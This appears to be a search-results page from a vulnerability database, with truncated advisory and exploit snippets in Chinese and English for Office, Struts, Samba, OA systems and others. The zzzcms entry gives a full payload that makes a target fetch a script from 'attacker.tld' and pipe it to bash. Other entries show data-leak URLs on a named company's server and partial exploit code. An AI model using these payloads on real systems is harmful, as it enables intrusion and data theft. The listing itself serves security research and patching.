56796 matches found
Microsoft Office 内存损坏漏洞(CVE-2015-1641)
来源: http://drops.wooyun.org/papers/9809 Microsoft Office 内存损坏漏洞 0x01 漏洞概述 今年4月份微软修补了一个名为CVE-2015-1641的word类型混淆漏洞,攻击者可以构造嵌入了docx的rtf文档进行攻击。word在解析docx文档处理displacedByCustomXML属性时未对customXML对象进行验证,可以传入其他标签对象进行处理,造成类型混淆,导致任意内存写入,最终经过精心构造的标签以及对应的属性值可以造成远程任意代码执行。 根据微软官方MS15-33安全公告里显示,这个漏洞覆盖Office 2007...
zenphoto 1.4.3.3 - Multiple Vulnerabilities
No description provided by source. waraxe-2012-SA096 - Multiple Vulnerabilities in Zenphoto 1.4.3.3 =============================================================================== Author: Janek Vind waraxe Date: 03. November 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-96.html...
Remote Code Execution in CouchDB(CVE-2017-12635)
There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remo...
ProFTPD多个模块目录遍历和缓冲区溢出漏洞
BUGTRAQ ID: 44562 CVE ID: CVE-2010-3867 ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的src/netio.c文件中的prnetiotelnetgets函数在处理包含有Telnet IAC转义序列的用户输入时存在栈溢出,远程攻击者可以通过向FTP或FTPS服务提交恶意输入导致执行任意代码。 此外modsitemisc模块中存在多个输入验证错误,攻击者可以通过目录遍历攻击写入或删除任意目录、创建符号链接或更改文件时间。 ProFTPD Project ProFTPD 1.3.x 厂商补丁: ProFTPD Project...
用友致远A6 /yyoa/DownExcelBeanServlet 敏感信息泄露
用友致远A6协同系统 存在问题的链接: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&perid=0 只有系统管理才有的权限,但是任意用户都可以访问。 可以下载所有员工的个人信息,包括身份证、联系方式、职位等敏感信息。 以某公司为例子,直接访问: http://oa.juntongtongxin.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&perid=0...
YXcms后台SQL注入漏洞
...
Apache mod_proxy Reverse Proxy Exposure
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache HTTP Server Security Advisory ==================================== Title: modproxy reverse proxy exposure CVE: CVE-2011-3368 Date: 20111005 Product: Apache HTTP Server Versions: httpd 1.3 all versions, httpd 2...
某政务智能搜索引擎第三方组件漏洞导致任意盘符目录浏览+后台默认口令
简要描述: 某政务智能搜索引擎第三方组件漏洞导致任意盘符目录浏览+后台默认口令; 详细说明: 爱觅桔智能搜索引擎是中科汇联自主研发的“提供知识的搜索引擎”,首创知识图谱关联、百姓体匹配、智能引导、自定义框计算等特色搜索服务功能,采用语义理解技术、机器学习技术,实现智能搜索、文档搜索、多媒体搜索功能。 漏洞一:第三方组件调用未进行授权访问 网站调用了jquery 显示本地文件的插件 jQuery File Tree: 文件分别为 jquery.js jquery核心库 jqueryFileTree.js (jqueryFileTree核心库) jqueryFileTree.jsp...
用友某系统漏洞(SSRF&Java反序列化命令执行漏洞)
简要描述: 1.SSRF内网信息嗅探; 2.Java反序列化命令执行:获取系统权限。 详细说明: 用友私有云运营中心 http://219.232.202.154:8080//home 部署的weblogic: 漏洞证明: 1.SSRF 默认搜索页面存在: 结合http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html,以localhost为例进行测试: 2.Java反序列化命令执行 测试EXP:...
Vacron NVR Remote Command Execution
Vulnerability Summary The following advisory describes a remote command execution vulnerability. VACRON Specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other...
RealVNC Authentication Bypass
No description provided by source. $Id: realvnc41bypass.rb 13641 2011-08-26 04:40:21Z bannedit $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms...
S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection methodthe detection method by the constant...
Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly...
PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the...
ASUS RT-N16 - Text-plain Admin Password Disclosure
Description ----------- Several ASUS routers include reflected Cross-Site Scripting CWE-79 and authentication bypass CWE-592 vulnerabilities. An attacker who can lure a victim to browse to a web site containing a specially crafted JavaScript payload can execute arbitrary commands on the router as...
Apache HTTP Server 'mod_proxy'反向代理信息泄露漏洞
Bugtraq ID: 49957 CVE ID:CVE-2011-3368 Apache HTTP Server是一款开放源代码的HTTPD服务程序。 Apache HTTP Server modproxy模块存在安全漏洞,允许恶意用户绕过部分安全限制。 当modproxy模块配置以反向代理模式时受此漏洞影响,由于不正确处理部分WEB请求,攻击者构建特制的URL可向代理后的不可期服务器发送恶意请求。 要成功利用漏洞需要使用具有一定的模式匹配的"ProxyPassMatch"和"RewriteRule"配置命令。 Apache 2.0.x Apache 2.2.x 厂商解决方案...
ISC BIND 9 'libdns' 远程拒绝服务漏洞(CVE-2013-2266)
Bugtraq ID:58736 CVE ID:CVE-2013-2266 ISC BIND是一款DNS协议的实现 ISC BIND存在一个安全漏洞,允许远程攻击者利用漏洞发送特制的请求,使目标named服务在处理规则表达式时消耗大量内存,造成系统崩溃。 BIND 9.6.x和10.x不受此漏洞影响。此外此漏洞仅影响unix及相关的操作系统,基于windows的版本不受此漏洞影响。 0 ISC BIND 9.7.x, 9.8.0 - 9.8.5b1, 9.9.0 - 9.9.3b1 厂商解决方案 ISC BIND 9.8.4-P2, 9.9.2-P及更改版本已经修复此漏洞,建议用户下载更...
AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability
No description provided by source. HYIP ACME Version SQL Injection Vulnerability ======================================================== Author: Hussin X = = Home : www.tryag.cc/cc = = email: darkangelg85atYahooDoTcom = hussin.xathotmailDoTcom = =...
Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28523/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of a...
zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞(CVE-2021-32605)
curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...
iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit
No description provided by source. !-- iMesh = 7.1.0.x IMWebControl Class IMWeb.dll 7.0.0.x remote heap exploit IE7/XP full patched by rgod, site: http://retrogod.altervista.org/ software site: http://www.imesh.com "iMesh is a file sharing and online social network. It uses a proprietary,...
An Analysis of the OpenSSL SSL Handshake Error State Security Bypass (CVE-2017-3737)
OpenSSL is a widely used library for SSL and TLS protocol implementation that secures data using encryption and decryption based on cryptographic functions. However, a Security Bypass vulnerability – recently addressed in a patch by the OpenSSL Project –can be exploited to make vulnerable SSL...
Samba: symlink race permits opening files outside share directory (CVE-2017-2619)
The Samba server is supposed to only grant access to the configured share directories unless the "wide links" are enabled, in which case the server is allowed to follow symlinks. The default since CVE-2010-0926 is that wide links are disabled. smbd ensures that it isn't following symlinks by...
冰峰VPN /log/system.log 敏感信息泄漏漏洞
由于“ICEFLOW VPN Router”设备产品存在各种日志文件未授权访问可导致系统敏感信息泄漏。(包括登录成功后的session值) 系统日志http://url/log/system.log VPN日志http://url/log/vpn.log 移动用户日志http://url/log/mobile.log 防火墙日志http://url/log/firewall.log 访问日志http://url/log/access.log 告警日志http://url/log/warn.log 错误日志http://url/log/error.log...
Sendmail CA SSL证书验证漏洞
BUGTRAQ ID: 37543 CVE ID: CVE-2009-4565 Sendmail是很多大型站点都在使用的邮件传输代理(MTA)。 Sendmail没有正确地验证X.509证书主题的通用名称(CN)字段的域名中的空字符(\0),在处理包含有空字符的证书字段时错误地将空字符处理为截止字符,因此只会验证空字符前的部分。例如,对于类似于以下的名称: example.com\0.haxx.se...
DokuWiki fetch.php SSRF vulnerability
Author: baolongniucow protection Dragon About DokuWiki DokuWiki is an open source wiki engine program, running on PHP environment. DokuWiki program small but powerful, flexible, suitable for small teams and personal web site Knowledge Base management. Vulnerability description DokuWiki latest...
泛微 OA sysinterface/codeEdit.jsp 页面任意文件上传
0x01 漏洞概述 相关厂商: 泛微OA 官方主页: http://www.weaver.com.cn/ 公开时间: 2015-11-25 漏洞类型: 非授权访问/权限绕过 无需登录上传文件。 http://localhost:8088/sysinterface/codeEdit.jsp?filename=5308.java&filetype=java filename为文件名称 为空时会自动创建。 0x02 漏洞利用 代码详情 String fileid = "Ewv"; String readonly = ""; boolean isCreate = false;...
Eclipse Jetty 信息泄露漏洞(CVE-2021-28169)
...
Apache Tomcat Security Bypass Vulnerability(CVE-2018-1305)
Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.4 Apache Tomcat 8.5.0 to 8.5.27 Apache Tomcat 8.0.0.RC1 to 8.0.49 Apache Tomcat 7.0.0 to 7.0.84 Description: Security constraints defined by annotations of Servlets were only applied once a Servlet had been...
Ubuntu PAM 1.1.0 MOTD - Local Root Exploit
No description provided by source. !/bin/bash Exploit Title: Ubuntu PAM MOTD local root Date: July 9, 2010 Author: Anonymous Software Link: http://packages.ubuntu.com/ Version: pam-1.1.0 Tested on: Ubuntu 9.10 Karmic Koala, Ubuntu 10.04 LTS Lucid Lynx CVE: CVE-2010-0832 Patch Instructions: sudo...
Apache mod_proxy_ftp模块远程命令注入漏洞
BUGTRAQ ID: 36254 CVE ID: CVE-2009-3095 Apache HTTP Server是一款流行的Web服务器。 Apache服务器的modproxyftp模块中存在远程命令注入漏洞。在逆向代理配置中,远程攻击者可以利用这个漏洞通过创建特制的HTTP Authorization头绕过预期的访问限制,向FTP服务器发送任意命令。 Apache Group Apache 2.2.x 厂商补丁: Apache Group ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Apache 2.2.x Scoreboard本地安全限制绕过漏洞
BUGTRAQ ID: 51407 CVE ID: CVE-2012-0031 Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器,可以在大多数电脑操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 Apache HTTP Server中的子进程可以更改scoreboard共享内存段的内存类型记录,这会被利用造成父进程关闭时无效的释放操作,使本地攻击者可绕过某些安全限制。 0 Apache 2.2.x 厂商补丁: Apache Group ------------...
HFS HTTP File Server任意文件上传漏洞
HTTP File Server是一款基于HTTP的文件服务程序。 HTTP File Server不正确过滤用户提交的文件数据,远程攻击者可以利用漏洞进行目录遍历攻击,上传文件到任意目标文件夹。 使用'../'形式的文件名形式,可绕过目录限制,上传文件到任意系统位置。 HTTP File Server HTTP File Server 2.2a HTTP File Server HTTP File Server 2.2 升级程序: HTTP File Server HTTP File Server 2.2a HTTP File Server HTTP File Server 2.2b...
Kangle虚拟主机本地文件包含漏洞
测试环境:kangle-3.3.9.msi,ep-2.6.4.exe(官方4-18日更新),windows XP 首先安装kangle server,然后安装easypanel,安装成功后访问http://127.0.0.1:3312/,会自动跳转到http://127.0.0.1:3312/vhost/?c=session&a=loginForm。 然后随便输入用户名密码登陆,如图发送的请求: 然后修改请求url中的参数c的值,将session改为: C=../../../../../../../../../../../windows/system.ini%00...
Samba 3.0.21-3.0.24 LSA trans names Heap Overflow
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
CKFinder 1.4.3 文件上传漏洞
CKFinder是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。 CKFinder 1.4.3...
EternalChampion - Windows SMB Remote Code Execution Vulnerability (CVE-2017-0146)
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 SMBv1 server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server. To exploit the vulnerability, in most...
Thinkphp3.2.3最新版update注入漏洞
原文来自安全客,作者:0r3ak@0kee Team 原文: 简要描述 thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其中Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程中在update更新数据的过程中存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。 Git补丁更新 新增加了BIND表达式 漏洞详情...
WordPress Core 4.6 - Unauthenticated Remote Code Execution
============================================= - Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - CVE-2016-10033 - Release date: 03.05.2017 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY -----------------------...
Web Wiz Forums字符串过滤SQL注入漏洞
Web Wiz Forums是一款基于ASP的WEB应用程序。 Web Wiz Forums不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息。 问题是'page.asp'脚本对用户提交的'NewsID'参数缺少过滤,提交恶意SQL代码作为参数数据,可导致更改原来的SQL逻辑,获得敏感信息。 Web Wiz Forums 8.05a之前版本 升级到最新版本: http://www.webwizguide.info/news/newsitem.asp?NewsID=103 form method="post"...
Dahua DVR 2.608.0000.0 and 2.608.GV00.0 - Authentication Bypass
No description provided by source. Dahua DVR Authentication Bypass - CVE-2013-6117 --Summary-- Dahua web-enabled DVRs and rebranded versions do not enforce authentication on their administrative services. Zhejiang Dahua Technology Co., Ltd. http://www.dahuasecurity.com --Affects-- Dahua web-enabl...
Yappa-NG Admin_Module_Deldir.Inc.PHP远程文件包含漏洞
Yappa-NG是一款基于PHP的WEB应用程序。 Yappa-NG不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'AdminModuleDeldir.Inc.PHP'脚本对用户提交的'configpathsrcinclude'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 yappa-ng yappa-ng 2.3.1 yappa-ng yappa-ng 2.3 .0 yappa-ng yappa-ng 2.2.2 yappa-ng yappa-ng 2.2.1 yappa-ng yappa-...
Linux Kernel TUNSETIFF释放后重用本地拒绝服务漏洞(CVE-2013-4343)
BUGTRAQ ID: 62360 CVECAN ID: CVE-2013-4343 Linux Kernel是Linux操作系统的内核。 Linux kernel 3.11及之前版本初始化tuntap接口时存在本地拒绝服务漏洞,攻击者通过无效名利用此漏洞造成内核崩溃。 0 Linux kernel = 3.11 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.kernel.org/ http://permalink.gmane.org/gmane.linux.kernel/1559873...
帆软 V9未授权RCE漏洞
...
Network Time Protocol Trap Crash Denial of Service Vulnerability(CVE-2016-9311)
Summary An exploitable denial of service vulnerability exists in the trap functionality of ntpd. If an ntpd instance is configured to send traps, a specially crafted network packet can be used to cause a null pointer dereference resulting in a denial of service. This vulnerability can be triggere...
com_extcalendar Mambo Component <= 2.0 Include Vulnerability
No description provided by source. -------------------------------------------------------------------------------- Title : ExtCalendar Mambo Module = v2 Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- dork :...
CKEditor 4.0.1 多个安全漏洞
CKEditor是一款在线文字编辑器 CKEditor存在多个安全漏洞,允许攻击者利用漏洞进行跨站请求伪造,跨站脚本攻击及获取路径信息 0 CKEditor 4.0.1 厂商解决方案 目前没有详细解决方案提供: http://ckeditor.com/ =========================================== Vulnerable Software: ckeditor 4.0.1 standard Download:...
Huawei Echo Life HG8247 HTML注入漏洞
Bugtraq ID:66594 CVE ID:CVE-2014-0337 Huawei Echo Life HG8247是一款光纤路由器。 Huawei Echo Life HG8247 optical router V1R006C00S120版本才能在一个存储型跨站脚本漏洞,允许攻击者通过提交恶意username,在"failed log-in attempts over telnet"日志中创建恶意条目,当恶意条目被查看时可获取敏感信息或劫持用户会话。 0 Huawei Echo Life HG8247 Huawei Echo Life HG8247 HG8247...
Apache HTTP Server mod_proxy_ajp拒绝服务漏洞
CVECAN ID: CVE-2011-3348 Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器,可以在大多数电脑操作系统中运行,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 Apache HTTP Server的modproxybalancer在实现上存在安全漏洞,恶意用户可利用此漏洞造成拒绝服务。 此漏洞源于结合modproxybalancer使用时,modproxyajp中的畸形HTTP请求处理时的错误。通过发送特制的HTTP请求,可造成后端服务器故障,直到重试超时结束后才会结束临时DoS。 Apache Group...
Ghostscript remote code execution (CVE-2017-8291) (ghostbutt)
No description provided by source. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /sizefrom 10000 def /sizestep 500 def /sizeto 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 sizefrom sizestep sizeto pop 1 add for /buffercount exch def /buffersizes buffercount array def 0 sizefrom...